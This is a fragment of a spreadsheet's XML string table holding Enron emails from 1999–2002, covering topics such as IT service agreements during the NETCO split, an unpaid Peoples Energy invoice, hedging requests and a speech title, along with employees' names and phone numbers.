    <t>frozenset({'steve.stock@enron.com', 'j..yanowski@enron.com', 'beth.perlman@enron.com', 'jeff.johnson@enron.com', 'bob.mcauliffe@enron.com'})</t>
  </si>
  <si>
    <t>RE: IT &amp; Back Office Service Agreements</t>
  </si>
  <si>
    <t xml:space="preserve">Just to clarify the Canadian situation, we will not be able to assign the M=_x000D_
SA's to NETCO without the customer's approval.  To date, this has not occur=_x000D_
red._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Yanowski, Tommy J. =20_x000D_
Sent:=09Wednesday, January 02, 2002 2:50 PM_x000D_
To:=09Perlman, Beth; Johnson, Jeff; Stock, Steve; McAuliffe, Bob_x000D_
Cc:=09Webb, Jay; Burchfield, Richard; Beck, Sally; Piper, Greg; Kitchen, Lo=_x000D_
uise; Hedstrom, Peggy; Koehler, Anne C.; Redmond, Brian_x000D_
Subject:=09IT &amp; Back Office Service Agreements_x000D_
_x000D_
Enron North America and Enron Canada are still providing IT and Back Office=_x000D_
 Services to several parties.  Beth has expressed some concerns about the e=_x000D_
state's ability to be able to support  a production trading environment onc=_x000D_
e a split of applications and hardware is made between NETCO and the estate=_x000D_
.  Given this we need to make some decisions as to how to best handle these=_x000D_
 services agreements.  Here are some suggestions:_x000D_
_x000D_
Peggy Hedstrom, in Calgary would like to assign the Enron Canada Master Ser=_x000D_
vices agreements to NETCO and continue to service those via that entity._x000D_
_x000D_
Bridgeline, which is a JV in which ENA owns a 40% interest, currently has n=_x000D_
o way that they can support themselves.  They are totally dependent on Enro=_x000D_
n for everything from email, internet, network services and office applicat=_x000D_
ions as well as trading, risk and back office applications.  If there are c=_x000D_
oncerns about the estate's ability to support Bridgeline then it may be in =_x000D_
Enron's best interest to assign this agreement to NETCO._x000D_
_x000D_
AEP/HPL is more of a stand alone operation.  They have their own infrastruc=_x000D_
ture in place and currently provide for their own email and office support =_x000D_
services.  They have also brought up with their own version of our SCADA sy=_x000D_
stem and are in the process of trying to bring up their own version of our =_x000D_
Pipeline Operations system.  If we sell them our version of PGAS to support=_x000D_
 their measurement operations they will then try to tie these applications =_x000D_
into their own Trade Blotter, Open Link Financials and Altra.  Their goal w=_x000D_
as to try and have all of this in place by sometime in June of this year.  =_x000D_
Given all of the Commercial conflicts with AEP regarding the sale of HPL it=_x000D_
 may make the most sense to leave this agreement with the estate and sugges=_x000D_
t that AEP try to be stand alone ASAP.  That way if the estate defaults on =_x000D_
the service agreement then they can at least manually rekey information fro=_x000D_
m one system to another until they have put in their own integration betwee=_x000D_
n the applications listed above._x000D_
_x000D_
Please let me know if you have any comments or if it makes sense to put tog=_x000D_
ether a meeting to discuss the issues of Service Agreements._x000D_
_x000D_
 =20_x000D_
_x000D_
Tommy J Yanowski_x000D_
Sr. Director - Enron Net Works_x000D_
Work # 713.853.6858_x000D_
Cell # 713.539.7094_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Perlman, Beth =20_x000D_
Sent:=09Wednesday, December 19, 2001 3:54 PM_x000D_
To:=09Johnson, Jeff; Stock, Steve; McAuliffe, Bob_x000D_
Cc:=09Webb, Jay; Yanowski, Tommy J.; Burchfield, Richard_x000D_
Subject:=09RE: Integration Test Planning / Coordination Mtg Summary_x000D_
_x000D_
The AEP and Bridgeline deals must be investigated.  There is no way the est=_x000D_
ate can support a production environment.  I will be reviewing the contract=_x000D_
s to determine our obligations and possible alternatives._x000D_
_x000D_
Beth_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Johnson, Jeff =20_x000D_
Sent:=09Wednesday, December 19, 2001 2:23 PM_x000D_
To:=09Stock, Steve; McAuliffe, Bob; Greig, Iain; Nommensen, Dave; Ward, Bob=_x000D_
; Sanvido, Terry; Wei, Zhiyong; Nat, Steve; Harmon, Kenneth M.; Warner, Joh=_x000D_
n; Saleem, Aftab; Smith, Regan M.; Hillier, Bob_x000D_
Cc:=09Webb, Jay; Perlman, Beth_x000D_
Subject:=09Integration Test Planning / Coordination Mtg Summary_x000D_
_x000D_
_x000D_
_x000D_
Key Planning Assumptions_x000D_
1) Jan 20 go live_x000D_
2) New Co Conversions must be completed and tested by application teams by =_x000D_
Jan 15. This assumes all major production data setup - users, rights, books=_x000D_
, global data - is completed and tested on a per application basis. Some co=_x000D_
de changes may still be in process but integration testing can begin to ens=_x000D_
ure the applications still talk to each other.=20_x000D_
3) Integration test planning focus will be to run representative transactio=_x000D_
ns from EOL to SAP through all core trading applications to ensure that app=_x000D_
lications and interfaces still work. We will not be testing functional perm=_x000D_
utations, data conditions, validation or exceptions to any significant degr=_x000D_
ee.=20_x000D_
4) Each application conversion team must test their changes before approvin=_x000D_
g their changes for integration testing. We are operating from the premise =_x000D_
that data, infrastructure and code changes have been tested at a applicatio=_x000D_
n system level before the enterprise integration test starts.=20_x000D_
4) All systems will be physically split (even Unify at this point).=20_x000D_
5) Integration test team will develop and execute the test plan for both Es=_x000D_
tate and New Co.=20_x000D_
6) We will integrate key business reps into the process for planning and ex=_x000D_
ecution and they will have shared responsibility for signoff on the test to=_x000D_
 support go live to production.=20_x000D_
7) We will minimize the differentiation between New Co and Estate for conve=_x000D_
rsion and test team purposes. There are two teams - Conversion and Integrat=_x000D_
ion Test. Each team will focus on both Estate and New Co. Resources are too=_x000D_
 tight and the process is too inefficient to separate responsibility.=20_x000D_
8) Estate conversions must happen at the application level before New Co co=_x000D_
nversion work can begin in earnest. Estate conversion is on the critical pa=_x000D_
th for New Co.=20_x000D_
_x000D_
_x000D_
Key Issues_x000D_
1) We will push to get a decision to see if we can focus on financial tradi=_x000D_
ng first, then physical. If financial is the focus, delivery risk goes down=_x000D_
 dramatically. For now, we must plan on the worst case -- physical and fina=_x000D_
ncial on Jan 20.=20_x000D_
2) We need both a dev and a test environment for all systems that support A=_x000D_
EP and Bridgeline in Estate. This means that we need a dev environment (and=_x000D_
 HW gap addressed) for Unify, Sitara, CPR, TAGG/ERMS. Conversion teams need=_x000D_
 to coordinate with infrastructure immediately on this issue to make sure w=_x000D_
e're in synch.=20_x000D_
3) Unify servers probably can't be owned by New Co while running a single l=_x000D_
icense of Unify.=20_x000D_
4) Some systems are using 'short name' instead of Duns ID as a key for coun=_x000D_
terparties from Global. The Global, TAGG / ERMS, Unify and SAP reps must qu=_x000D_
ickly define the best approach for making global data changes and minimizin=_x000D_
g hard coded reference id risks.=20_x000D_
5) We must clearly define limits of conversion and test scope to hit these =_x000D_
potential dates. We must focus on core systems with only core changes requi=_x000D_
red to support day one trading.=20_x000D_
6) We can only convert Estate over the weekend due to AEP / Bridgeline cons=_x000D_
iderations. The time window will be very small.=20_x000D_
_x000D_
_x000D_
Core Conversion Team =20_x000D_
1) Steve Stock - Applications_x000D_
2) Bob McAuliffe - Infrastructure_x000D_
3) Ziyong Wei_x000D_
4) Steve Nat_x000D_
5) Dave Nommensen_x000D_
6) Ken Harmon_x000D_
7) John Warner_x000D_
8) Bob Ward_x000D_
...._x000D_
_x000D_
Core Integration Test Team=20_x000D_
1) Jeff Johnson_x000D_
2) Iain Greig_x000D_
3) Aftab Saleem_x000D_
4) Terry Sanvido_x000D_
5) Regan Smith_x000D_
_x000D_
Program Coordination=20_x000D_
1) Jane Henry_x000D_
2) Steve Simpson_x000D_
_x000D_
Next Steps For Integration Test Team_x000D_
1) Due 12/20. Define integration test approach and id test script and expec=_x000D_
ted results templates. Owner: Aftab Saleem / Regan Smith_x000D_
2) Due Jan 3. Application system flow diagram at appropriate granularity fo=_x000D_
r communicating flow on integration test for core systems. Owner: Terry San=_x000D_
vido / Steve Simpson_x000D_
3) Due 12/20. Identify list of core systems for test purposes. Identify key=_x000D_
 IT owner and key business owner and respresentative for integration test. =_x000D_
Owner: Iain Greig.=20_x000D_
4) Due 12/21. Define integration test workplan for integration test plannin=_x000D_
g and execution for both Estate and New Co. Owner: Jeff Johnson_x000D_
5) Ongoing. Participation in daily program management coordination meeting =_x000D_
at 8:30. Owners: Jeff Johnson, Iain Greig, Aftab Saleem.=20_x000D_
6) Due 12/21. Organize meeting with key users and IT contacts to communciat=_x000D_
e foundation assumptions, context, team and approach for integration test. =_x000D_
Develop first cut at sample trade transaction set. Owner: Iain Greig / Afta=_x000D_
b Saleem.=20_x000D_
7) Completed. Contact Bob Hall, Leslie Reeves, Bob Superty, Brice Baxter to=_x000D_
 communicate above and set up meeting to begin planning with them on the in=_x000D_
tegration testing process. Owner: Jeff Johnson_x000D_
8) Due 12/21.  Refine core system list with IT owners and Business owners f=_x000D_
or integration test purposes. Owner: Iain Greig.=20_x000D_
9) Due 12/20. Set up Integration Test folder on O drive under Infotech / De=_x000D_
velopment Support.  Owner: Aftab Saleem.=20_x000D_
_x000D_
Let me know if you have questions or changes. I am out tomorrow but I'm bac=_x000D_
k on Friday.=20_x000D_
_x000D_
Thanks.=20_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Mar 2002 07:00:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rita.wynne@enron.com'})</t>
  </si>
  <si>
    <t>RE: Peoples Energy invoice</t>
  </si>
  <si>
    <t xml:space="preserve">sorry, not till i hear from legal but we probably won't pay the invoice.  as of right now, don't pay the invoice._x000D_
-----Original Message-----_x000D_
From: Wynne, Rita _x000D_
Sent: Thursday, March 14, 2002 8:18 AM_x000D_
To: Germany, Chris_x000D_
Subject: RE: Peoples Energy invoice_x000D_
_x000D_
_x000D_
Chris,_x000D_
 _x000D_
So do I pay the invoice or not.  I'm a little confused from all the emails.  Please advise.  Thanks._x000D_
-----Original Message-----_x000D_
From: Germany, Chris _x000D_
Sent: Wednesday, March 13, 2002 1:20 PM_x000D_
To: Mann, Kay_x000D_
Cc: Brady, Kevin; Wynne, Rita; Shemin V. Proctor (E-mail)_x000D_
Subject: RE: Peoples Energy invoice_x000D_
_x000D_
_x000D_
_x000D_
Kay, ENA has a user ID on a system called Pegasys.  Peoples Gas invoices ENA about $400.00 a month for a License Fee, Customer Service Charge, and taxes and it looks like we have not paid this bill for the last 3 months.  In the pre-petition world, we used this ID to do nominations on the Peoples Gas system.  We are not currently using this ID and it looks like we no longer need an ID for this system.  BUT, Kevin Brady, an ENA scheduler, uses an Enovate and EMW LLC id to do nominations for those companies. Enovate is paying the invoices for those companies.  Can we cancel this ID, or should we just tell Peoples we are not going to pay the invoice and let them terminate the ID at their discretion?  Will not paying the ENA invoice impact EMW LLC or Enovate in any way?_x000D_
_x000D_
 _x000D_
 _x000D_
 _x000D_
 -----Original Message-----_x000D_
From: Pikofsky, Lynn _x000D_
Sent: Wednesday, March 13, 2002 10:38 AM_x000D_
To: Germany, Chris; Wynne, Rita_x000D_
Cc: Tomaski, Richard; Penman, Gregg; Brady, Kevin_x000D_
Subject: FW: Peoples Energy invoice_x000D_
_x000D_
_x000D_
Chris,_x000D_
I work with Richard in the Chicago office.  I received the faxed copy of the Pegasys invoice from Houston.  Enovate pays two invoices every month, one for Enovate and one for EMW LLC.  The outstanding invoice includes past due charges from Enron North America. I spoke with Kevin Brady and he does not sign on as ENA, so can that account be cancelled?  With that, I am not sure why enovate would pay for this invoice._x000D_
Lynn_x000D_
 _x000D_
-----Original Message----- _x000D_
From: Germany, Chris _x000D_
Sent: Wed 3/13/2002 9:08 AM _x000D_
To: Wynne, Rita _x000D_
Cc: Tomaski, Richard; Olinger, Kimberly S.; Brady, Kevin _x000D_
Subject: RE: Peoples Energy invoice_x000D_
Give me your fax number and I'll fax it over.  Doug Sewell said he would not pay for it as ENA and I don't know enough about the deal to argue with him.  I've pasted in Richard's response is in black below._x000D_
-----Original Message----- _x000D_
From: Tomaski, Richard _x000D_
Sent: Tuesday, March 12, 2002 5:01 PM _x000D_
To: Germany, Chris _x000D_
Subject: Re: FW: Peoples Energy invoice _x000D_
 _x000D_
I'm familar with the item. It sounds like enovate should pay it if it is enovate access. _x000D_
Is this taken care of or do I need to call someone to pay it?  Let me know _x000D_
Richard _x000D_
 _x000D_
 -----Original Message----- _x000D_
From:   Wynne, Rita  _x000D_
Sent:   Wednesday, March 13, 2002 8:42 AM _x000D_
To:     Germany, Chris _x000D_
Cc:     Tomaski, Richard _x000D_
Subject:        RE: Peoples Energy invoice _x000D_
No I am not.  Donna Grief called me on Monday concerning this and I told her we would need Commercial's blessing and then approval by the cash committee.  I agreed to handle it because of the urgency of it needing to be paid.  According to Kim, normally it would appear on a buy/sale ticket and therefore, Margaret Dhont's group would handle this.  I'm not really sure what group should handle it.  Is there an invoice that you can get to me so that I can have it as backup support for the cash request?_x000D_
 -----Original Message----- _x000D_
From:   Germany, Chris  _x000D_
Sent:   Tuesday, March 12, 2002 4:33 PM _x000D_
To:     Wynne, Rita _x000D_
Cc:     Tomaski, Richard _x000D_
Subject:        FW: Peoples Energy invoice _x000D_
Are you familiar with this item? _x000D_
 -----Original Message----- _x000D_
From:   Olinger, Kimberly S.  _x000D_
Sent:   Tuesday, March 12, 2002 3:18 PM _x000D_
To:     Germany, Chris _x000D_
Subject:        RE: Peoples Energy invoice _x000D_
chris - forward the info to rita wynne and she will expedite the payment _x000D_
 -----Original Message----- _x000D_
From:   Germany, Chris  _x000D_
Sent:   Tuesday, March 12, 2002 2:20 PM _x000D_
To:     Tomaski, Richard _x000D_
Cc:     Brady, Kevin; Olinger, Kimberly S.; McMichael Jr., Ed _x000D_
Subject:        Peoples Energy invoice _x000D_
Beth Jenkins gave me your name as an Enron contact regarding Enovate. _x000D_
I work for Ed McMichael on the gas side of the Enron Estate team.  Kevin Brady schedules gas for the Enron Estate Team.  Kevin received an invoice from Peoples Energy in the amount of $1,380.44, it looks like this invoice has not been paid in a few months.  I just faxed the invoice to you at 312-541-2728.  This invoice is for a license fee and a customer charge for Pegasys, the system Kevin uses to do nominations on Peoples Gas Light &amp; Coke.  All the activity is for the Enovate deals.  Doug Sewell said that this should be paid by Enovate, not Enron.  Kevin was told by Peoples that if this invoice is not paid, they will terminate Kevin's access.  Do you know who we could forward this too so that it can get processed correctly?_x000D_
Thanks _x000D_
Chris L. Germany _x000D_
Phone 713-853-4743 _x000D_
Fax  713-646-3059 </t>
  </si>
  <si>
    <t>Tue, 26 Oct 1999 02:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Mexico advice</t>
  </si>
  <si>
    <t xml:space="preserve">I'm most concerned about the internet aspect of things now - this is new _x000D_
advice we are requesting and I would not expect it to be the lion's share of _x000D_
the expense - presumably the update portion will be relatively easy._x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Tana Jones                           10/26/99 09:45 AM_x000D_
	_x000D_
_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Mexico advice_x000D_
_x000D_
Per Shari this a.m., we had already requested an update on Ritch, Heather's _x000D_
legal advice from another law firm in Mexico, Lopez Vallardi.  You have _x000D_
already authorized payment of the bill.  The fax requesting an update from _x000D_
Ritch, Heather went out yesterday.  What would you like to do?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 09:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Tomorrow...</t>
  </si>
  <si>
    <t>have you partying this week already with Shawn?_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Lenhart, Matthew  _x000D_
Sent: Wednesday, May 02, 2001 3:55 PM_x000D_
To: Gillette, Lisa_x000D_
Subject: Re: Tomorrow..._x000D_
_x000D_
that was a mistake.  i don't know what i was thinking.  i need to stay home.</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 00:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.gorte@enron.com', 'ted.murphy@enron.com', 'rick.carson@enron.com', 'william.bradford@enron.com', 'mark.ruane@enron.com'})</t>
  </si>
  <si>
    <t>Saleries</t>
  </si>
  <si>
    <t>You all should have received instruction from Sheila W. on the system for _x000D_
salaries. I need that info late today so I can look at over the weekend. _x000D_
Numbers are due Monday am. Rick</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 18:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'thinkguzman@yahoo.com'})</t>
  </si>
  <si>
    <t>Cita</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mark,_x000D_
_x000D_
David got home tonight and told me the fun you guys had in Seattle.? The snow _x000D_
shoe hike sounded like a good work out and fun too, but I'm sure I wouldn't _x000D_
have made it as smoothly as the rest of you.? I'm so fucking fat and I'm _x000D_
determined to get back in the shape that I should be and the way I was most _x000D_
of my life!? I've got to start working out on a consistent basis.? David said _x000D_
that if I don't the family is going to have a FAT intervention on me!!!_x000D_
_x000D_
By the way, a note about Cita.? I can't even begin to tell you how much she _x000D_
loves you and since Bill left us she's even looking at you as a spiritual _x000D_
replacement of him.? Now I'm not saying that she doesn't love Angela as much, _x000D_
but Cita has a bond with the boys in our family (Kevin, Donald, Steve) in a _x000D_
totally different way as she does with the girls!!? I can't explain why (I've _x000D_
got my theories) but she just does.? _x000D_
_x000D_
Anyway, I was visiting her on Monday and she was really distraught about the _x000D_
last conversation she had with you over the phone while you were at Jorge's _x000D_
house.? She said that she felt that you misunderstood what she meant when she _x000D_
said that Bill was stupid.? I'm sure you know what she meant by it as far as _x000D_
him not wanting to change his life style (drinking &amp; smoking), but she felt _x000D_
that you got mad at her for calling him stupid.? Her biggest consern is that _x000D_
she feels for that reason you probably won't want to talk to her again or _x000D_
much at all!!? I did tell her that you are a dick but that you're not that _x000D_
big of a dick!!? Regardless, we all know that you're a?prick anyway, but _x000D_
could you please give her a call sometime soon just to put her mind at ease?? _x000D_
You don't have to mention the "stupid" word or conversation, just call her to _x000D_
say hi and that you miss her more than she misses you!? Don't tell her that I _x000D_
emailed you about! my conversation with her.? Otherwise she'll just say "what _x000D_
the fuck is an email?"_x000D_
_x000D_
Looking forward to seeing you later this month.(the 23rd)? Also, I want you _x000D_
to know that you're really not a prick, your a dickhead!_x000D_
_x000D_
As always - with way more love than you deserve,? Uncle (fat) Bobby!!!_x000D_
_x000D_
_x000D_
_x000D_
Do You Yahoo!?_x000D_
Yahoo! Photos -  Share your holiday photos online! </t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 07:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Technical Corner Paper</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 10/30/2000 _x000D_
03:35 PM ---------------------------_x000D_
_x000D_
_x000D_
Zimin Lu_x000D_
09/28/2000 04:46 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, William Smith/Corp/Enron@ENRON_x000D_
cc: Stinson Gibner/HOU/ECT@ECT _x000D_
Subject: Technical Corner Paper_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
As you suggested, I splited the paper into two parts, the first one_x000D_
devotes to the FX market and second one to gas market.  Attached_x000D_
is the first part._x000D_
_x000D_
Let me know if there is any mistakes in there,  thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sam,_x000D_
_x000D_
Vince wants to publish this article in the next Monday edition of the _x000D_
research intelligence._x000D_
Thanks._x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 13 May 2001 12:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Ever wonder . . . ._x000D_
_x000D_
? Do those sports drink like Gatorade work?_x000D_
? How much exercise is too much?_x000D_
? If I want to bulk-up those muscles, is Creatine safe?_x000D_
? Do weight gaining powders work?_x000D_
? What about diet pills?_x000D_
_x000D_
Then join Dr. Joel Bloom for an Enron eSpeak on Tuesday, March 15, 2001 at _x000D_
10:00 AM when he will answer these questions and many more.  Just go to _x000D_
http://ethink.enron.com/._x000D_
_x000D_
Dr. Bloom is an Associate Professor in the Department of Health and Human _x000D_
Performance at the University of Houston. Joel specializes in Biomechanics, _x000D_
Sports Medicine, and Aquatic Therapy.  He is a strong advocate for bringing _x000D_
back physical activity into public schools and is on the Texas Commission for _x000D_
Bicycle Safety.  He has also published several books and numerous articles on _x000D_
sports performance, exercise, biomechanics, injury prevention, and  training _x000D_
programs._x000D_
_x000D_
Dr. Bloom will talk about:_x000D_
_x000D_
? Sports Drinks vs. Water/ Truths and Myths_x000D_
? Stretching/Truths and Myths_x000D_
? Myths about Abdominal Exercises_x000D_
? Supplements/ Risks and Benefits_x000D_
? Food Label Reading/Fact or Fiction?_x000D_
? To breakfast or not to Breakfast?_x000D_
_x000D_
So join us on Tuesday, March 15 on eSpeak._x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 09:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Carl Tricoli</t>
  </si>
  <si>
    <t xml:space="preserve">I think I will coordinate with Zimin, and have Guadalupe do some research on _x000D_
equities linked to corn price.  Initially, there will be some scenario _x000D_
analysis done, and we can explore the possible use of options theory._x000D_
_x000D_
Vasant_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
04/05/2000 02:41 PM_x000D_
To: Carl Tricoli/Corp/Enron@ENRON_x000D_
cc: Zimin Lu/HOU/ECT@ECT, Vasant Shanbhogue/HOU/ECT@ECT, Vince J _x000D_
Kaminski/HOU/ECT@ECT _x000D_
Subject: Re: Carl Tricoli  _x000D_
_x000D_
Carl,_x000D_
_x000D_
Depends if it is more like financial or insurance type hedging._x000D_
_x000D_
I shall leave it to Vasant to decide._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carl Tricoli@ENRON_x000D_
04/05/2000 11:19 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Zimin Lu/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, Vasant _x000D_
Shanbhogue/HOU/ECT@ECT, Christopher A Helfrich/HOU/ECT@ECT _x000D_
Subject: Re: Carl Tricoli  _x000D_
_x000D_
Vince, thank you for the response.  In the interim, we met with Vasant _x000D_
Shanbhogue yesterday and explained the deal and what we needed.  Should _x000D_
Vasant continue to work on it, or would you still like us to loop in Zimin _x000D_
Lu?  _x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski@ECT_x000D_
04/05/2000 10:11 AM_x000D_
To: Zimin Lu/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Carl Tricoli/Corp/Enron@Enron _x000D_
_x000D_
Subject: Carl Tricoli_x000D_
_x000D_
Zimin,_x000D_
_x000D_
Carl Tricoli  (5-8958) will call you regarding help on ethanol (hedging)._x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 06:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Need another reference</t>
  </si>
  <si>
    <t>Scott,_x000D_
_x000D_
Thanks a lot.  I really appreciate your support._x000D_
_x000D_
Steve</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 11:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mkaplan@carbon.cudenver.edu'})</t>
  </si>
  <si>
    <t>Re: Title for speech</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. Kaplan -_x000D_
_x000D_
Mr. Lay would like to title his speech "Energy and Climate Realism in a _x000D_
Political World"  . We look forward to receiving additional information._x000D_
_x000D_
Thanks._x000D_
_x000D_
Rosalee_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Marshall Kaplan" &lt;mkaplan@carbon.cudenver.edu&gt; on 04/03/2001 10:23:30 AM_x000D_
To: &lt;klay@enron.com&gt;_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
Kenneth Lay_x000D_
Chairman, Enron_x000D_
_x000D_
from_x000D_
_x000D_
Marshall Kaplan_x000D_
_x000D_
Western State Power Forum: May 22 and May 23_x000D_
_x000D_
Plans are proceeding nicely for the Western State Forum on May 22 and May_x000D_
23.  We have an outstanding group of confirmed speakers and panelists_x000D_
including many individuals that I assume you know as colleagues and friends._x000D_
I will be sending you more information on the Forum in the next few days. I_x000D_
am going to send you the preliminary agenda  this morning._x000D_
_x000D_
You will be speaking at a critical time in the Forum; that is, just after_x000D_
panels on power problems and polices and just before the final session_x000D_
linking power and energy strategies to environmental objectives. It would be_x000D_
great if your talk to the participants in the Forum could help them see the_x000D_
relationship between power and energy related objectives and environmental_x000D_
issues including GHG emissions. You should feel free however to focus your_x000D_
talk in a manner of your choosing. Again, I will send you the prelim. agenda_x000D_
soon.  Could you send me a title however for the final agenda's purposes?_x000D_
We hope to print the final agenda later this week.    Thank you._x000D_
_x000D_
Marshall Kaplan, Executive Director_x000D_
Institute for Policy Implementation_x000D_
University of Colorado at Denver_x000D_
1445 Market Street, Suite 350_x000D_
Denver, Colorado 80202_x000D_
tel: 303-820-5602   fax: 303-534-8774_x000D_
email:  mkaplan@carbon.cudenver.edu_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Jun 2001 17:15:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'m.scott.kuehn@intel.com'})</t>
  </si>
  <si>
    <t>techweb reviews enron vs ebiz standards</t>
  </si>
  <si>
    <t>FYI decent article describes enron in terms of ebiz._x000D_
_x000D_
from techweb:_x000D_
7. ENRON FEELS THE POWER_x000D_
People thought trading energy products online would never work. One year and_x000D_
$200 billion later, Enron's just getting started._x000D_
http://update.techweb.com/cgi-bin4/flo?y=eDt70BC1Fl0H30Otv0Ag_x000D_
_x000D_
_x000D_
Also, several friends from work are coming down for the Timbers on_x000D_
Wednesday.  Are you interested?_x000D_
-Scott</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 08:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Executive Committee Residential Addresses</t>
  </si>
  <si>
    <t xml:space="preserve">fyi.  print_x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 11/13/2000 _x000D_
04:46 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Katherine Brown @ ENRON                           11/13/2000 02:50 PM_x000D_
	_x000D_
_x000D_
To: James M Bannantine/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cliff _x000D_
Baxter/HOU/ECT@ECT, Sanjay Bhatnagar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Jeremy Blachman/HOU/EES@EES, Philippe A Bibi/HOU/ECT@ECT, Raymond _x000D_
Bowen/HOU/ECT@ECT, Michael R Brown/LON/ECT@ECT, Harold G _x000D_
Buchanan/HOU/EES@EES, Rick Buy/HOU/ECT@ECT, Richard Causey/Corp/Enron@ENRON, _x000D_
Diomedes Christodoulou/SA/Enron@Enron, Wade _x000D_
Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David Cox/Enron _x000D_
Communications@Enron Communications, David W Delainey/HOU/ECT@ECT, James _x000D_
Derrick/Corp/Enron@ENRON, Steve Elliott/Enron Communications@Enron _x000D_
Communications, Jim Fallon/Enron Communications@Enron Communications, Andrew _x000D_
S Fastow/HOU/ECT@ECT, Mark Frevert/NA/Enron@Enron, Ben F Glisan/HOU/ECT@ECT, _x000D_
Kevin Hannon/Enron Communications@Enron Communications, David _x000D_
Haug/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rod Hayslett/FGT/Enron@ENRON, _x000D_
Stanley Horton/Corp/Enron@Enron, James A _x000D_
Hughes/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Larry L _x000D_
Izzo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Steven J Kean/NA/Enron@Enron, _x000D_
Louise Kitchen/HOU/ECT@ECT, Mark Koenig/Corp/Enron@ENRON, Kenneth _x000D_
Lay/Corp/Enron@ENRON, John J Lavorato/Corp/Enron@Enron, Dan Leff/HOU/EES@EES, _x000D_
Danny McCarty/ET&amp;S/Enron@Enron, Mike McConnell/HOU/ECT@ECT, Rebecca _x000D_
McDonald/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jeffrey McMahon/HOU/ECT@ECT, _x000D_
Mark Metts/NA/Enron@Enron, Mark S Muller/HOU/EES@EES, Cindy _x000D_
Olson/Corp/Enron@ENRON, Lou L Pai/HOU/EES@EES, Ken Rice/Enron _x000D_
Communications@Enron Communications, Matthew Scrimshaw/LON/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT, Jeffrey Sherrick/Corp/Enron@ENRON, John _x000D_
Sherriff/LON/ECT@ECT, Jeff Skilling/Corp/Enron@ENRON, Marty _x000D_
Sunde/HOU/EES@EES, Greg Whalley/HOU/ECT@ECT, Thomas E White/HOU/EES@EES, G G _x000D_
Garcia/NA/Enron@Enron, Marcia Manarin/SA/Enron@Enron, Susan _x000D_
Skarness/HOU/ECT@ECT, Stacy Guidroz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Beena Pradhan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Karen K _x000D_
Heathman/HOU/ECT@ECT, Sharron Westbrook/Corp/Enron@ENRON, Kay _x000D_
Chapman/HOU/ECT@ECT, Molly Bobrow/NA/Enron@Enron, Rosane _x000D_
Fabozzi/SA/Enron@Enron, Stephanie Harris/Corp/Enron@ENRON, Bridget _x000D_
Maronge/HOU/ECT@ECT, Nicki Daw/NA/Enron@Enron, Inez Dauterive/HOU/ECT@ECT, _x000D_
Carol Ann Brown/Enron Communications@Enron Communications, Elaine _x000D_
Rodriguez/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cindy Stark/Corp/Enron@ENRON, _x000D_
